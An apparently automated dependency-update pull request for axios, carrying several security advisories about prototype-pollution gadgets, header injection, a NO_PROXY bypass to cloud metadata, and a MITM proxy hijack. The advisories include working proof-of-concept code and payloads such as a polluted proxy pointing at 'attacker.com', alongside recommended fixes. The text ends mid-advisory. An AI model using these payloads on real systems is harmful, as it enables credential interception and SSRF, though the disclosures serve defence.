fix(deps): update dependency axios to v1.16.0 [security]

[renovate]

ℹ️ Note

This PR body was truncated due to platform limits.

This PR contains the following updates:

Package	Change	Age	Adoption	Passing	Confidence
axios (source)	1.15.2 → 1.16.0

---

Warning

Some dependencies could not be looked up. Check the Dependency Dashboard for more information.

---

Axios has a Patch Bypass: Proxy-Authorization Header Injection via Prototype Pollution — Incomplete Null-Prototype Fix

CVE-2026-44489 / GHSA-654m-c8p4-x5fp

More information

Details

[Patch Bypass] Proxy-Authorization Header Injection via Prototype Pollution — Incomplete Null-Prototype Fix in Axios 1.15.2

Summary

The Object.create(null) fix introduced in Axios 1.15.2 (GHSA-q8qp-cvcw-x6jj) protects the top-level config object from prototype pollution. However, nested objects created by utils.merge() (e.g., config.proxy) are still constructed as plain {} with Object.prototype in their chain.

The setProxy() function at lib/adapters/http.js:209-223 reads proxy.username, proxy.password, and proxy.auth without hasOwnProperty checks. When Object.prototype.username is polluted, setProxy() constructs a Proxy-Authorization header with attacker-controlled credentials and injects it into every proxied HTTP request.

Severity: Medium (CVSS 5.4)
Affected Versions: 1.15.2 (and potentially 1.15.1)
Vulnerable Component: lib/adapters/http.js (setProxy()) + lib/utils.js (merge())

CWE

• CWE-1321: Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
• CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting')

CVSS 3.1

Score: 5.6 (Medium)

Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L

Metric	Value	Justification
Attack Vector	Network	PP triggered remotely via vulnerable dependency
Attack Complexity	High	Requires two preconditions: (1) PP in dependency tree, AND (2) the application must explicitly configure config.proxy. Unlike GHSA-q8qp-cvcw-x6jj which affected all requests unconditionally
Privileges Required	None	No authentication needed
User Interaction	None	No user interaction required
Scope	Unchanged	Within the proxy authentication context
Confidentiality	Low	Attacker-controlled identity appears in proxy authentication logs, but the attacker does NOT see request/response data (unlike config.baseURL hijack)
Integrity	Low	Proxy-Authorization header injected; proxy may apply different access policies based on injected identity
Availability	Low	If proxy rejects the injected credentials, legitimate requests may fail

Why This Is Lower Severity Than GHSA-q8qp-cvcw-x6jj (7.4 High)

Factor	GHSA-q8qp-cvcw-x6jj	This Finding
Precondition	None — all requests affected	Must have config.proxy set
config.baseURL PP	Hijacks all relative URL requests	Not applicable
config.auth PP	Injects Authorization to target server	Only injects Proxy-Authorization to proxy
Attacker sees traffic	Yes (via baseURL redirect)	No — only proxy identity affected
Impact scope	Universal — every axios request	Only requests with explicit proxy config

This Is a Patch Bypass

This vulnerability bypasses the fix introduced in Axios 1.15.2 for GHSA-q8qp-cvcw-x6jj. The fix correctly uses Object.create(null) for the config object, blocking direct prototype pollution on config.proxy, config.auth, etc.

However, the fix is incomplete: when a user legitimately sets config.proxy = { host: 'proxy.corp', port: 8080 }, the mergeConfig() function passes this object through utils.merge(), which creates a new plain {} object (lib/utils.js:406: const result = {};). This new object inherits from Object.prototype, re-opening the prototype pollution attack surface on the nested proxy object.

Layer	Protection	Status
config (top-level)	Object.create(null)	✓ Fixed
config.proxy (nested)	utils.merge() → const result = {}	✗ NOT Fixed
setProxy() reads	proxy.username, proxy.auth without hasOwnProperty	✗ NOT Fixed

Root Cause Analysis

Step 1: utils.merge() creates plain {} for nested objects

File: lib/utils.js, line 406

function merge(/* obj1, obj2, obj3, ... */) {
  const result = {};  // ← Plain object with Object.prototype!
  // ...
}

When mergeConfig() processes config.proxy, getMergedValue() calls utils.merge(), which creates a plain {} for the nested object. This plain object inherits from Object.prototype.

Step 2: setProxy() reads proxy properties without hasOwnProperty

File: lib/adapters/http.js, lines 209-223

function setProxy(options, configProxy, location) {
  let proxy = configProxy;
  // ...
  if (proxy) {
    if (proxy.username) {                    // ← traverses Object.prototype!
      proxy.auth = (proxy.username || '') + ':' + (proxy.password || '');
    }

    if (proxy.auth) {                        // ← traverses Object.prototype!
      const validProxyAuth = Boolean(proxy.auth.username || proxy.auth.password);
      if (validProxyAuth) {
        proxy.auth = (proxy.auth.username || '') + ':' + (proxy.auth.password || '');
      }
      // ...
      const base64 = Buffer.from(proxy.auth, 'utf8').toString('base64');
      options.headers['Proxy-Authorization'] = 'Basic ' + base64;  // ← INJECTED!
    }
    // ...
  }
}

Complete Attack Chain

Object.prototype.username = 'attacker'
Object.prototype.password = 'stolen-creds'
         │
         ▼
  User config: { proxy: { host: 'proxy.corp', port: 8080 } }
         │
         ▼
  mergeConfig() → utils.merge() → new plain {}
  config.proxy = { host: 'proxy.corp', port: 8080 }  (own properties)
  config.proxy inherits from Object.prototype         (has .username, .password)
         │
         ▼
  setProxy() at http.js:209:
    proxy.username → 'attacker' (from Object.prototype) → truthy!
    proxy.auth = 'attacker' + ':' + 'stolen-creds'
         │
         ▼
  http.js:223: Proxy-Authorization: Basic YXR0YWNrZXI6c3RvbGVuLWNyZWRz
  Injected into EVERY proxied HTTP request!

Proof of Concept

import http from 'http';
import axios from './index.js';

// Proxy server logs received Proxy-Authorization
const proxyServer = http.createServer((req, res) => {
  console.log('Proxy-Authorization:', req.headers['proxy-authorization']);
  res.writeHead(200);
  res.end('OK');
});
await new Promise(r => proxyServer.listen(0, r));
const proxyPort = proxyServer.address().port;

// Target server
const target = http.createServer((req, res) => { res.writeHead(200); res.end(); });
await new Promise(r => target.listen(0, r));

// Simulate prototype pollution from vulnerable dependency
Object.prototype.username = 'attacker';
Object.prototype.password = 'stolen-creds';

// Developer sets proxy WITHOUT auth — expects no auth header
await axios.get(`http://127.0.0.1:${target.address().port}/api`, {
  proxy: { host: '127.0.0.1', port: proxyPort, protocol: 'http' },
});

// Proxy receives: Proxy-Authorization: Basic YXR0YWNrZXI6c3RvbGVuLWNyZWRz
// Decoded: attacker:stolen-creds

delete Object.prototype.username;
delete Object.prototype.password;
proxyServer.close();
target.close();

Reproduction Environment

Axios version: 1.15.2 (latest patched release)
Node.js version: v20.20.2
OS: macOS Darwin 25.4.0

Reproduction Steps

##### 1. Install axios 1.15.2
npm pack axios@1.15.2
tar xzf axios-1.15.2.tgz && mv package axios-1.15.2
cd axios-1.15.2 && npm install

##### 2. Save PoC as poc.mjs (code from Section 7 above)

##### 3. Run
node poc.mjs

Verified PoC Output

=== Axios 1.15.2: PP → Proxy-Authorization Injection ===

[1] Normal request with proxy (no auth):
  Proxy-Authorization: none

[2] Prototype Pollution: Object.prototype.username = "attacker"
  Proxy-Authorization: Basic YXR0YWNrZXI6c3RvbGVuLWNyZWRz
  Decoded: attacker:stolen-creds
  → PP injected proxy credentials: attacker:stolen-creds

[3] Impact:
  ✗ Attacker injects Proxy-Authorization into all proxied requests
  ✗ If proxy logs auth, attacker credential appears in proxy logs
  ✗ If proxy authenticates based on this, attacker controls proxy identity
  ✗ Works on 1.15.2 despite null-prototype config fix
  ✗ Root cause: proxy object is plain {} from utils.merge, NOT null-prototype

Confirming the Bypass Mechanism

Direct PP (config.proxy) — BLOCKED by 1.15.2:
  Object.prototype.proxy = { host: 'evil' }
  config.proxy = undefined            ← null-prototype blocks ✓

Nested PP (proxy.username) — BYPASSES 1.15.2:
  Object.prototype.username = 'attacker'
  config.proxy = { host: 'legit', port: 8080 }  ← user-set, own properties
  config.proxy own keys: ['host', 'port']        ← username NOT own
  config.proxy.username = 'attacker'             ← inherited from Object.prototype!
  hasOwn(config.proxy, 'username') = false

##### Impact Analysis

- **Proxy Identity Spoofing:** The injected `Proxy-Authorization` header authenticates all requests to the proxy as the attacker. If the proxy enforces authentication-based access control or logging, the attacker controls the identity.
- **Proxy Log Poisoning:** Proxy servers that log authenticated usernames will record "attacker" instead of the real user, enabling audit trail manipulation.
- **Credential Injection Amplification:** If the proxy forwards the `Proxy-Authorization` header upstream (some transparent proxies do), the attacker's credentials propagate through the proxy chain.
- **Universal Scope When Proxy Is Configured:** Affects every axios request that uses a proxy configuration without explicit auth — a common pattern in corporate environments.

##### Prerequisite

- Application must use `config.proxy` (explicit proxy configuration)
- A separate prototype pollution vulnerability must exist in the dependency tree
- `Object.prototype.username` or `Object.prototype.auth` must be polluted

##### Recommended Fix

##### Fix 1: Use `hasOwnProperty` in `setProxy()`

```javascript
function setProxy(options, configProxy, location) {
  let proxy = configProxy;
  // ...
  if (proxy) {
    const hasOwn = (obj, key) => Object.prototype.hasOwnProperty.call(obj, key);

    if (hasOwn(proxy, 'username')) {
      proxy.auth = (proxy.username || '') + ':' + (proxy.password || '');
    }

    if (hasOwn(proxy, 'auth')) {
      // ... existing auth handling ...
    }
  }
}

Fix 2: Use null-prototype objects in utils.merge()

// lib/utils.js line 406
function merge(/* obj1, obj2, obj3, ... */) {
  const result = Object.create(null);  // ← null-prototype for nested objects too
  // ...
}

Fix 3 (Comprehensive): Apply null-prototype to all objects created by getMergedValue()

References

• CWE-1321: Prototype Pollution
• GHSA-q8qp-cvcw-x6jj: Original PP Gadgets Fix (Axios 1.15.2)
• GHSA-fvcv-3m26-pcqx: Related PP Gadget (Axios 1.15.0)
• Axios GitHub Repository

Severity

• CVSS Score: 3.7 / 10 (Low)
• Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N

References

• https://github.com/axios/axios/security/advisories/GHSA-654m-c8p4-x5fp
• https://github.com/axios/axios/security/advisories/GHSA-q8qp-cvcw-x6jj
• https://nvd.nist.gov/vuln/detail/CVE-2026-44489
• https://github.com/advisories/GHSA-654m-c8p4-x5fp

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

axios has DoS & Header Injection via Prototype Pollution Read-Side Gadgets in axios merge functions

CVE-2026-44490 / GHSA-898c-q2cr-xwhg

More information

Details

Summary

axios 1.15.2 exposes two read-side prototype-pollution gadgets. When Object.prototype is polluted by an upstream dependency in the same process (e.g. lodash _.merge / CVE-2018-16487), axios silently picks up the polluted values:

1. Header injection - lib/utils.js line 406 builds merge()'s accumulator as result = {}, so result[targetKey] (line 414) walks Object.prototype and the polluted bucket's own keys are copied into the merged headers and ride out on the wire.
2. Crash DoS - lib/core/mergeConfig.js line 26 builds the hasOwnProperty descriptor as a plain-object literal. Object.defineProperty reads descriptor.get/descriptor.set via the prototype chain, so a polluted Object.prototype.get or Object.prototype.set makes the call throw TypeError synchronously on every axios request.

Affected Properties

Polluted slot	Effect
Object.prototype.common	injects headers on every method
Object.prototype.delete / .head / .post / .put / .patch / .query	injects headers on the matching method
Object.prototype.get	every axios request throws TypeError: Getter must be a function from mergeConfig.js:26
Object.prototype.set	every axios request throws TypeError: Setter must be a function from mergeConfig.js:26

Per-request headers (axios.request(url, { headers: {...} })) overwrite polluted entries. Polluting Object.prototype.get triggers the crash before any header is built.

Proof of Concept

const axios = require('axios');

// Finding A - header injection
Object.prototype.common = { 'X-Poisoned': 'yes' };
await axios.get('http://api.example.com/users');
// Wire request carries `X-Poisoned: yes`.

// Finding B - crash DoS
Object.prototype.get = { something: 'anything' };
await axios.get('http://api.example.com/users');
// TypeError: Getter must be a function: #<Object>
//     at Function.defineProperty (<anonymous>)
//     at mergeConfig (lib/core/mergeConfig.js:26:10)

Impact

• Server hang (Content-Length: 99999): receiver waits for a body that never arrives. Affects requests with a body.
• CL+TE conflict (Transfer-Encoding: chunked rides alongside axios's auto Content-Length): receiver rejects with 400 Bad Request. Affects requests with a body.
• Response suppression (If-None-Match: *): receiver returns empty 304 Not Modified. Affects GET / HEAD.
• Crash DoS (Object.prototype.get / .set): every axios request fails synchronously with TypeError, not AxiosError, so handlers filtering on error.isAxiosError mishandle the failure.

Attack Flow

flowchart TD
    ROOT["Polluted Object.prototype<br/>via upstream gadget (e.g. lodash &lt;= 4.17.10 _.merge / CVE-2018-16487)<br/>axios &lt;= 1.15.2"]

    ROOT --> CLASS_A["A. Arbitrary HTTP Header Injection<br/>Polluted defaults.headers slot rides along on every outbound axios request"]
    ROOT --> CLASS_B["B. Crash DoS via Object.prototype.get / .set<br/>Polluted descriptor breaks Object.defineProperty in mergeConfig"]

    CLASS_A --> PRE_A["Precondition: header not set per-request by the app<br/>Injected via defaults.headers slot<br/>(common, delete, head, post, put, patch, query)"]

    PRE_A --> PA1["Response Suppression<br/>Trigger: common = {If-None-Match: *}<br/>Affects GET / HEAD"]
    PA1 --> SA1["DoS<br/>304 Not Modified empty"]

    PRE_A --> PA2["Server Hang<br/>Trigger: common = {Content-Length: 99999}<br/>Affects requests with body"]
    PA2 --> SA2["DoS<br/>connection hang"]

    PRE_A --> PA3["CL+TE Conflict<br/>Trigger: common = {Transfer-Encoding: chunked}<br/>Affects requests with body"]
    PA3 --> SA3["DoS<br/>400 Bad Request"]

    CLASS_B --> SB1["DoS<br/>TypeError: Getter / Setter must be a function<br/>Crashes every axios request, not only GET"]

    %% Styles
    style ROOT fill:#f87171,stroke:#&#8203;991b1b,color:#fff
    style CLASS_A fill:#fb923c,stroke:#&#8203;9a3412,color:#fff
    style CLASS_B fill:#fb923c,stroke:#&#8203;9a3412,color:#fff
    style PRE_A fill:#e2e8f0,stroke:#&#8203;64748b,color:#&#8203;1e293b
    style PA1 fill:#fbbf24,stroke:#&#8203;92400e,color:#&#8203;000
    style PA2 fill:#fbbf24,stroke:#&#8203;92400e,color:#&#8203;000
    style PA3 fill:#fbbf24,stroke:#&#8203;92400e,color:#&#8203;000
    style SA1 fill:#ef4444,stroke:#&#8203;991b1b,color:#fff
    style SA2 fill:#ef4444,stroke:#&#8203;991b1b,color:#fff
    style SA3 fill:#ef4444,stroke:#&#8203;991b1b,color:#fff
    style SB1 fill:#ef4444,stroke:#&#8203;991b1b,color:#fff

Loading

Root Cause

Finding A. lib/utils.js:404-429's merge() creates result = {} at line 406. The dangerous-keys filter on lines 408-411 blocks the write side, but the read at line 414 (isPlainObject(result[targetKey])) still walks the prototype chain. When targetKey matches a polluted slot, result[targetKey] returns the polluted nested object, and the recursive merge(result[targetKey], val) on line 415 iterates that object's own keys via forEach and copies them as own properties into the new accumulator. Those keys flow through mergeConfig.js:35 → Axios.js:148 (utils.merge(headers.common, headers[config.method])) → Axios.js:155 (AxiosHeaders.concat(...)) → onto the wire via http.js:677 (headers: headers.toJSON()) → http.js:767 (transport.request(options, ...)).

Finding B. lib/core/mergeConfig.js:25 correctly makes config = Object.create(null), but the descriptor passed on line 26 is a plain-object literal - its get/set lookups walk Object.prototype. A polluted non-function Object.prototype.get or .set makes Object.defineProperty throw TypeError: Getter must be a function (or Setter must be a function) before the call returns. The descriptor is built unconditionally on every mergeConfig invocation, so every axios request throws - POST, PUT, DELETE, PATCH, HEAD, QUERY, not only GET.

Suggested Fix

Use null-prototype objects in place of the plain-object literals at lib/utils.js:406 and lib/core/mergeConfig.js:26-31. The same descriptor pattern recurs at lib/core/AxiosError.js:37, lib/core/AxiosHeaders.js:100, lib/utils.js:447/454/492/498, and lib/adapters/adapters.js:28/32.

Resources

• CVE-2018-16487 - lodash.merge prototype pollution in lodash <= 4.17.10
• CWE-1321 - Improperly Controlled Modification of Object Prototype Attributes

Severity

• CVSS Score: 4.8 / 10 (Medium)
• Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L

References

• https://github.com/axios/axios/security/advisories/GHSA-898c-q2cr-xwhg
• https://nvd.nist.gov/vuln/detail/CVE-2018-16487
• https://nvd.nist.gov/vuln/detail/CVE-2026-44490
• https://github.com/advisories/GHSA-898c-q2cr-xwhg

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

axios's shouldBypassProxy does not recognize IPv4-mapped IPv6 addresses, allowing NO_PROXY bypass (incomplete fix for CVE-2025-62718)

CVE-2026-44492 / GHSA-pjwm-pj3p-43mv

More information

Details

Summary

shouldBypassProxy, introduced in v1.15.0 to fix CVE-2025-62718, does not normalise IPv4-mapped IPv6 addresses. When NO_PROXY lists an IPv4 address such as 127.0.0.1 or 169.254.169.254, a request URL using the IPv4-mapped IPv6 form (::ffff:7f00:1, ::ffff:a9fe:a9fe) still routes through the configured proxy. Node.js resolves these addresses to the underlying IPv4 host, so the request reaches the internal service via the proxy rather than being blocked.

Details

lib/helpers/shouldBypassProxy.js (v1.15.0):

  const LOOPBACK_ADDRESSES = new Set(['localhost', '127.0.0.1', '::1']);                                                                                                      
  const isLoopback = (host) => LOOPBACK_ADDRESSES.has(host);                                                                                                                    
                                                                                                                                                                                
  // normalizeNoProxyHost strips brackets and trailing dots, but not ::ffff: prefix                                                                                             
  return hostname === entryHost || (isLoopback(hostname) && isLoopback(entryHost));                                                                                             

The WHATWG URL parser canonicalises http://[::ffff:127.0.0.1]/ to hostname [::ffff:7f00:1]. After bracket-stripping: ::ffff:7f00:1. This string does not match 127.0.0.1 in NO_PROXY and is not in LOOPBACK_ADDRESSES, so shouldBypassProxy returns false and the proxy is used. proxy-from-env (called before shouldBypassProxy) has the same gap - it does not equate ::ffff:7f00:1 with 127.0.0.1 - so neither layer catches the bypass.

PoC

// NO_PROXY=127.0.0.1,localhost,::1  HTTP_PROXY=http://attacker:8080
import shouldBypassProxy from 'axios/lib/helpers/shouldBypassProxy.js';                                                                                                       
                                                                                                                                                                              
// All three should return true (bypass proxy). Only the first two do.                                                                                                        
console.log(shouldBypassProxy('http://127.0.0.1/'));          // true  [OK]                                                                                                     
console.log(shouldBypassProxy('http://[::1]/'));               // true  [OK]                                                                                                     
console.log(shouldBypassProxy('http://[::ffff:127.0.0.1]/')); // false <- bypass                                                                                             
console.log(shouldBypassProxy('http://[::ffff:7f00:1]/'));     // false <- bypass

Node.js routes ::ffff:7f00:1 to 127.0.0.1:

// net.connect({ host: '::ffff:7f00:1', port: 80 }) reaches a service                                                                                                       
// bound to 127.0.0.1:80 — confirmed on Node.js v24, Linux and macOS.                                                                                                         

Cloud metadata SSRF: ::ffff:a9fe:a9fe = ::ffff:169.254.169.254. If NO_PROXY=169.254.169.254 is set to block IMDS access, a request to http://[::ffff:a9fe:a9fe]/latest/meta-data/ bypasses it.

Fix

Canonicalise IPv4-mapped IPv6 in normalizeNoProxyHost before any comparison:

const ipv4MappedDotted = /^::ffff:(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})$/i;                                                                                                    
const ipv4MappedHex    = /^::ffff:([0-9a-f]{1,4}):([0-9a-f]{1,4})$/i;                                                                                                         
                                                                                                                                                                             
function hexToIPv4(a, b) {                                                                                                                                                    
 const hi = parseInt(a, 16), lo = parseInt(b, 16);                                                                                                                           
 return `${hi >> 8}.${hi & 0xff}.${lo >> 8}.${lo & 0xff}`;                                                                                                                   
}                                                                                                                                                                             
                                                                                                                                                                             
const normalizeNoProxyHost = (hostname) => {                                                                                                                                  
 if (!hostname) return hostname;                                                                                                                                           
 if (hostname[0] === '[' && hostname.at(-1) === ']')
   hostname = hostname.slice(1, -1);                                                                                                                                         
 hostname = hostname.replace(/\.+$/, '').toLowerCase();
                                                                                                                                                                             
 let m;                                                                                                                                                                    
 if ((m = hostname.match(ipv4MappedDotted))) return m[1];                                                                                                                    
 if ((m = hostname.match(ipv4MappedHex)))    return hexToIPv4(m[1], m[2]);                                                                                                   
 return hostname;                                                                                                                                                            
};

Impact

Any application that sets NO_PROXY to exclude internal or metadata endpoints and uses an HTTP/HTTPS proxy can have those exclusions bypassed by a URL using IPv4-mapped IPv6 notation. The attacker must control the request URL. In cloud environments with instance metadata services, this can lead to credential exfiltration.

Severity

• CVSS Score: 8.6 / 10 (High)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

References

• https://github.com/axios/axios/security/advisories/GHSA-pjwm-pj3p-43mv
• https://nvd.nist.gov/vuln/detail/CVE-2025-62718
• https://github.com/advisories/GHSA-pjwm-pj3p-43mv

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

axios Vulnerable to Full Man-in-the-Middle via Prototype Pollution Gadget in config.proxy

CVE-2026-44494 / GHSA-35jp-ww65-95wh

More information

Details

Vulnerability Disclosure: Full Man-in-the-Middle via Prototype Pollution Gadget in config.proxy

Summary

The Axios library is vulnerable to a Prototype Pollution "Gadget" attack that allows any Object.prototype pollution in the application's dependency tree to be escalated into a full Man-in-the-Middle (MITM) attack — intercepting, reading, and modifying all HTTP traffic including authentication credentials.

The HTTP adapter at lib/adapters/http.js:670 reads config.proxy via standard property access, which traverses the prototype chain. Because proxy is not present in Axios defaults, the merged config object has no own proxy property, making it trivially injectable via prototype pollution. Once injected, setProxy() routes all HTTP requests through the attacker's proxy server.

Unlike the transformResponse gadget (which is constrained by assertOptions to return true), the proxy gadget has zero constraints — the attacker gets a full MITM position with the ability to read all credentials and tamper with all responses.

Severity: Critical (CVSS 9.4)
Affected Versions: All versions (v0.x - v1.x including v1.15.0)
Vulnerable Component: lib/adapters/http.js (config property access on merged object)

CWE

• CWE-1321: Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
• CWE-441: Unintended Proxy or Intermediary ('Confused Deputy')

CVSS 3.1

Score: 9.4 (Critical)

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

Metric	Value	Justification
Attack Vector	Network	PP is triggered remotely via any vulnerable dependency
Attack Complexity	Low	Once PP exists, single property assignment: Object.prototype.proxy = {host:'attacker', port:8080}. Consistent with GHSA-fvcv-3m26-pcqx scoring methodology
Privileges Required	None	No authentication needed
User Interaction	None	No user interaction required
Scope	Unchanged	MITM within the application's network context
Confidentiality	High	Attacker sees ALL request data: Authorization headers, auth credentials, cookies, request bodies, full URLs (including internal hostnames)
Integrity	High	Attacker can modify ALL responses: inject malicious data, alter API results, redirect authentication flows. No constraints — unlike transformResponse which must return true
Availability	Low	Attacker could drop requests or return errors, but this is secondary to C/I impact

Why This Bypasses mergeConfig

The critical difference from transformResponse: the proxy property is not in defaults (lib/defaults/index.js does not set proxy). This means:

1. mergeConfig iterates Object.keys({...defaults, ...userConfig}) — proxy is NOT in this set
2. defaultToConfig2 for proxy is never called
3. The merged config has no own proxy property
4. When http.js:670 reads config.proxy, JavaScript traverses the prototype chain
5. Object.prototype.proxy is found → used by setProxy()

This is a more direct attack path than transformResponse because it doesn't even go through mergeConfig's merge logic — it completely bypasses it.

Usage of "Helper" Vulnerabilities

This vulnerability requires Zero Direct User Input.

If an attacker can pollute Object.prototype via any other library in the stack (e.g., qs, minimist, lodash, body-parser), Axios will automatically use the polluted proxy value when making HTTP requests. The developer's code is completely safe — no configuration errors needed.

Proof of Concept

1. The Setup (Simulated Pollution)

Imagine a scenario where a known prototype pollution vulnerability exists in a query parser. The attacker sends a payload that sets:

Object.prototype.proxy = {
  host: 'attacker.com',
  port: 8080,
  protocol: 'http',
};

2. The Gadget Trigger (Safe Code)

The application makes a completely safe, hardcoded request:

// This looks safe to the developer — no proxy configured
const response = await axios.get('https://api.internal.corp/secrets', {
  auth: { username: 'svc-account', password: 'prod-key-abc123!' }
});

3. The Execution

At http.js:668-670:

setProxy(
  options,
  config.proxy,    // ← traverses prototype chain → finds polluted proxy
  protocol + '//' + parsed.hostname + (parsed.port ? ':' + parsed.port : '') + options.path
);

setProxy() at http.js:191-239 then:

function setProxy(options, configProxy, location) {
  let proxy = configProxy;    // = { host: 'attacker.com', port: 8080 }
  // ...
  if (proxy) {
    options.hostname = proxy.hostname || proxy.host;  // → 'attacker.com'
    options.port = proxy.port;                         // → 8080
    options.path = location;                           // → full URL as path
    // ...
  }
}

4. The Impact (Full MITM)

The attacker's proxy server receives:

GET http://api.internal.corp/secrets HTTP/1.1
Host: api.internal.corp
Authorization: Basic c3ZjLWFjY291bnQ6cHJvZC1rZXktYWJjMTIzIQ==
User-Agent: axios/1.15.0
Accept: application/json, text/plain, */*

The Authorization header contains svc-account:prod-key-abc123! in Base64. The attacker:

• Sees every request URL, header, and body
• Modifies every response (inject malicious data, change auth results)
• Logs all API keys, session tokens, and passwords
• Operates as an invisible proxy — the developer has no indication

5. Verified PoC Code

import http from 'http';
import axios from './index.js';

// Attacker's proxy server
const intercepted = [];
const proxyServer = http.createServer((req, res) => {
  intercepted.push({
    url: req.url,
    authorization: req.headers.authorization,
    headers: req.headers,
  });
  res.writeHead(200, { 'Content-Type': 'application/json' });
  res.end('{"hijacked":true}');
});
await new Promise(r => proxyServer.listen(0, r));
const proxyPort = proxyServer.address().port;

// Real target server
const realServer = http.createServer((req, res) => {
  res.writeHead(200);
  res.end('{"data":"real"}');
});
await new Promise(r => realServer.listen(0, r));
const realPort = realServer.address().port;

// Prototype pollution
Object.prototype.proxy = { host: '127.0.0.1', port: proxyPort, protocol: 'http' };

// "Safe" request — goes through attacker's proxy
const resp = await axios.get(`http://127.0.0.1:${realPort}/api/secrets`, {
  auth: { username: 'admin', password: 'SuperSecret123!' }
});

console.log('Response from:', resp.data.hijacked ? 'ATTACKER PROXY' : 'real server');
console.log('Intercepted Authorization:', intercepted[0]?.authorization);
// Output: Basic YWRtaW46U3VwZXJTZWNyZXQxMjMh (= admin:SuperSecret123!)

delete Object.prototype.proxy;
realServer.close();
proxyServer.close();

Verified PoC Output

[1] Normal request (before pollution):
    Response source: real server
    response.data: {"data":"from-real-server"}
    Proxy intercept count: 0

[2] Prototype Pollution: Object.prototype.proxy
    Set: Object.prototype.proxy = { host: "127.0.0.1", port: 50879 }

[3] Request after pollution (same code, same URL):
    Response source: ATTACKER PROXY!
    response.data: {"data":"from-attacker-proxy","hijacked":true}

[4] Data intercepted by attacker's proxy:
    Full URL: http://127.0.0.1:50878/api/secrets
    Host: 127.0.0.1:50878
    Authorization: Basic YWRtaW46U3VwZXJTZWNyZXQxMjMh
    All headers: {
      "accept": "application/json, text/plain, */*",
      "user-agent": "axios/1.15.0",
      "accept-encoding": "gzip, compress, deflate, br",
      "host": "127.0.0.1:50878",
      "authorization": "Basic YWRtaW46U3VwZXJTZWNyZXQxMjMh",
      "connection": "keep-alive"
    }

[5] Attacker capabilities demonstrated:
    ✓ Full URL visible (including internal hostnames)
    ✓ Authorization header visible (Base64-encoded credentials)
    ✓ Can modify/forge response data
    ✓ Affects ALL axios HTTP requests (not just a single instance)
    ✓ No assertOptions constraints (unlike transformResponse gadget)

Impact Analysis

• Full Credential Interception: Every HTTP request's Authorization header, cookies, API keys, and request bodies are visible to the attacker's proxy in plaintext.
• Arbitrary Response Tampering: The attacker can return any response data — no constraints like transformResponse's "must return true".
• Internal Network Reconnaissance: The proxy sees all request URLs, revealing internal hostnames, ports, and API paths.
• Universal Scope: Affects every axios HTTP request in the application, including all third-party libraries that use axios.
• Invisible Attack: The developer has no indication that a proxy has been injected — requests complete normally with attacker-controlled responses.
• Bypass of 1.15.0 Fix: The header sanitization patch in v1.15.0 (GHSA-fvcv-3m26-pcqx) does NOT address this vector.

Why This Is More Severe Than transformResponse (axios_26)

Dimension	transformResponse Gadget	proxy Gadget
Data access	this.auth + response data	All headers, auth, body, URL, response
Response control	Must return true	Arbitrary responses
Attack visibility	Response becomes true (suspicious)	Normal-looking responses (invisible)
mergeConfig involvement	Goes through defaultToConfig2	Bypasses mergeConfig entirely

Recommended Fix

Fix 1: Use hasOwnProperty when reading security-sensitive config properties

// In lib/adapters/http.js
const proxy = Object.prototype.hasOwnProperty.call(config, 'proxy') ? config.proxy : undefined;
setProxy(options, proxy, location);

Fix 2: Enumerate all properties not in defaults and apply hasOwnProperty

Properties not in defaults that are read by http.js and have security impact:

• config.proxy — MITM
• config.socketPath — Unix socket SSRF
• config.transport — request hijack
• config.lookup — DNS hijack
• config.beforeRedirect — redirect manipulation
• config.httpAgent / config.httpsAgent — agent injection

All should use hasOwnProperty checks.

Fix 3: Use null-prototype object for merged config

// In lib/core/mergeConfig.js
const config = Object.create(null);

Resources

• CWE-1321: Prototype Pollution
• CWE-441: Unintended Proxy
• GHSA-fvcv-3m26-pcqx: Related PP Gadget in Axios (Fixed in 1.15.0)
• Axios GitHub Repository

Timeline

Date	Event
2026-04-16	Vulnerability discovered during source code audit
2026-04-16	PoC developed and verified — full MITM confirmed
TBD	Report submitted to vendor via GitHub Security Advisory

Severity

• CVSS Score: 8.7 / 10 (High)
• Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N

References

• https://github.com/axios/axios/security/advisories/GHSA-35jp-ww65-95wh
• https://github.com/advisories/GHSA-fvcv-3m26-pcqx
• https://nvd.nist.gov/vuln/detail/CVE-2026-44494
• https://github.com/advisories/GHSA-35jp-ww65-95wh

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

Allocation of Resources Without Limits or Throttling in Axios

CVE-2026-44488 / GHSA-777c-7fjr-54vf

More information

Details

Summary

Axios versions 1.7.0 through 1.15.x did not enforce configured request and response size limits when requests were sent with the fetch adapter. Applications that selected adapter: 'fetch', or ran in environments where axios resolved to the fetch adapter, could receive or send bodies larger than maxContentLength or maxBodyLength despite those limits being explicitly configured.

This can cause resource exhaustion in server-side usage when a malicious or compromised server returns an oversized response, when an attacker can supply a large data: URL, or when an application forwards attacker-controlled request bodies through axios while relying on maxBodyLength as a boundary.

Impact

The impact is availability-only. Affected applications may process, buffer, or transmit data beyond the configured limit, potentially exhausting memory, CPU, or network resources.

This does not affect axios’s default unlimited behaviour by itself: maxContentLength and maxBodyLength default to -1. The vulnerability exists when an application has configured finite limits and expects axios to enforce them.

Server-side runtimes are the primary concern. Browser impact is generally constrained by the browser process and browser fetch behavior, and should not be described as server process exhaustion.

Affected Functionality

Affected functionality includes requests using the built-in fetch adapter with finite maxContentLength or maxBodyLength values.

Relevant configurations include:

• adapter: 'fetch'
• adapter: ['fetch', ...] when fetch is selected
• environments where neither xhr nor http is available and axios falls back to fetch
• custom fetch environments configured through env.fetch

Unaffected functionality includes:

• Node.js default http adapter enforcement
• versions before the fetch adapter was introduced
• configurations that do not rely on finite axios size limits

Technical Details

